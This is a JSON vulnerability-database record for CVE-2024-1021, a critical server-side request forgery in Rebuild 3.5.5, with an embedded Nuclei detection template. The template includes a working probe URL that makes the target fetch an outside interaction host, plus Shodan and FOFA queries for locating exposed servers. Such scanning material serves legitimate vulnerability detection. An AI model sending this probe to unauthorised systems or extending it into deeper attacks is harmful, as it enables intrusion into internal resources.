{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-1021/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-1021/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-1021/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-1021/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-1021/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-1021"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-1021"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-1021.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2024-1021\n\ninfo:\n  name: Rebuild <= 3.5.5 - Server-Side Request Forgery\n  author: BMCel\n  severity: critical\n  description: |\n    There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n  impact: |\n    Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.\n  remediation: |\n    Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.\n  reference:\n    - https://github.com/getrebuild/rebuild\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-1021\n    - https://vuldb.com/?ctiid.252290\n    - https://vuldb.com/?id.252290\n    - https://github.com/tanjiti/sec_profile\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2024-1021\n    cwe-id: CWE-918\n    epss-score: 0.34713\n    epss-percentile: 0.98371\n    cpe: cpe:2.3:a:ruifang-tech:rebuild:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: ruifang-tech\n    product: rebuild\n    shodan-query: http.favicon.hash:\"871154672\"\n    fofa-query: \"icon_hash=\\\"871154672\\\"\"\n  tags: cve2024,cve,rebuild,ssrf,ruifang-tech,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n      - \"{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body_2, \"<h1> Interactsh Server </h1>\")'\n          - '!contains(body_1, \"<h1> Interactsh Server </h1>\")'\n          - 'status_code_2 == 200'\n        condition: and\n# digest: 4a0a00473045022100caf8e79c802b55f491971fce714e892bc49f6fac34f08fefb01234e5fb50dda3022006e6b41c1f441926c5d4c500355dcbaf4156d8d1ae81fb523947c3ebcf45b439:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-1021"
}